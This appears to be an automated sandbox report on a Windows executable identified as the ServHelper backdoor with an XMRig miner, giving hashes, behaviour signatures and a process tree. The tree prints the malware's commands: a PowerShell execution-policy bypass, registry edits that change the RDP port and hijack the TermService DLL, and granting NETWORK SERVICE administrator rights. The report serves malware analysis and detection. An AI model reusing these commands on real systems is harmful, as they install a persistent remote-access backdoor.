Overview

overview

10

Static

static

44d42138d6...39.exe

windows7_x64

1

44d42138d6...39.exe

windows10_x64

10

Analysis

  • max time kernel
    131s
  • max time network
    140s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    13-10-2021 17:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    44d42138d67d0e52c3c26cb726bc8f39.exe

  • Size

    4.2MB

  • MD5

    44d42138d67d0e52c3c26cb726bc8f39

  • SHA1

    2613e0e464b334ed66e34a8cffc174c5603dd1d9

  • SHA256

    074d3a0bcfb3d4b0b179a2495004fb95947de60ce002fded7af1d1781add9d2b

  • SHA512

    9d59b4dfb96bbe5b59f1b5c0561dafd8fe3f2fb1ababf4e7a384577ddf63adb703802187e7a7bfd671c4fd67e84214bb2b3283edae85e0f2a424148d9e0be1fa

Score
10/10
servhelperxmrigbackdoorminerpersistencetrojan

Malware Config

Signatures

  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

    trojanbackdoorservhelper
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
    persistence
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 8 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\44d42138d67d0e52c3c26cb726bc8f39.exe
    "C:\Users\Admin\AppData\Local\Temp\44d42138d67d0e52c3c26cb726bc8f39.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3572
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2224
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ebzvxi4p\ebzvxi4p.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1180
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES468A.tmp" "c:\Users\Admin\AppData\Local\Temp\ebzvxi4p\CSC107718C646414F85A5263584553A3B5D.TMP"
          4⤵
            PID:1412
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2428
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3616
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4392
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:2340
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:3192
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:2784
            • C:\Windows\SysWOW64\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1072
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:5004
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4800
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1476
                  • C:\Windows\SysWOW64\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2552
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:5016
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5020
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:5068
                    • C:\Windows\SysWOW64\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1528
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:4700
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:4528
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:4376

                  Network

                  MITRE ATT&CK Enterprise v6

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • memory/2224-134-0x0000000004D42000-0x0000000004D43000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2224-129-0x0000000004AA0000-0x0000000004AA1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2224-132-0x0000000004D40000-0x0000000004D41000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2224-133-0x00000000073E0000-0x00000000073E1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2224-1062-0x000000007EE90000-0x000000007EE91000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2224-135-0x00000000072F0000-0x00000000072F1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2224-136-0x0000000007B10000-0x0000000007B11000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2224-138-0x0000000007BF0000-0x0000000007BF1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2224-139-0x0000000007F70000-0x0000000007F71000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2224-140-0x00000000080F0000-0x00000000080F1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2224-141-0x0000000008370000-0x0000000008371000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2224-156-0x00000000092C0000-0x00000000092C1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2224-143-0x0000000004AA0000-0x0000000004AA1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2224-147-0x0000000009970000-0x0000000009971000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2224-148-0x0000000008580000-0x0000000008581000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2224-130-0x0000000004AA0000-0x0000000004AA1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2224-158-0x0000000004D43000-0x0000000004D44000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2224-131-0x0000000004BE0000-0x0000000004BE1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2224-179-0x0000000009420000-0x0000000009421000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2428-190-0x0000000004982000-0x0000000004983000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2428-195-0x0000000003030000-0x0000000003031000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2428-182-0x0000000003030000-0x0000000003031000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2428-181-0x0000000003030000-0x0000000003031000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2428-216-0x000000007F290000-0x000000007F291000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2428-189-0x0000000004980000-0x0000000004981000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3572-118-0x0000000005570000-0x0000000005571000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3572-122-0x0000000005D90000-0x0000000005D91000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3572-126-0x00000000063C0000-0x00000000063C1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3572-115-0x0000000000C3D000-0x0000000001043000-memory.dmp

                    Filesize

                    4.0MB

                    Download

                  • memory/3572-116-0x0000000001050000-0x0000000001452000-memory.dmp

                    Filesize

                    4.0MB

                    Download

                  • memory/3572-121-0x0000000005572000-0x0000000005573000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3572-119-0x0000000005990000-0x0000000005D8F000-memory.dmp

                    Filesize

                    4.0MB

                    Download

                  • memory/3572-123-0x0000000005490000-0x0000000005491000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3572-117-0x0000000000400000-0x0000000000841000-memory.dmp

                    Filesize

                    4.3MB

                    Download

                  • memory/3572-124-0x0000000005573000-0x0000000005574000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3572-125-0x0000000005574000-0x0000000005575000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3572-127-0x0000000008240000-0x0000000008241000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3616-475-0x000000007F4E0000-0x000000007F4E1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3616-447-0x0000000006B12000-0x0000000006B13000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3616-445-0x0000000006B10000-0x0000000006B11000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4392-704-0x0000000004782000-0x0000000004783000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4392-703-0x0000000004780000-0x0000000004781000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4392-730-0x000000007EF80000-0x000000007EF81000-memory.dmp

                    Filesize

                    4KB

                    Download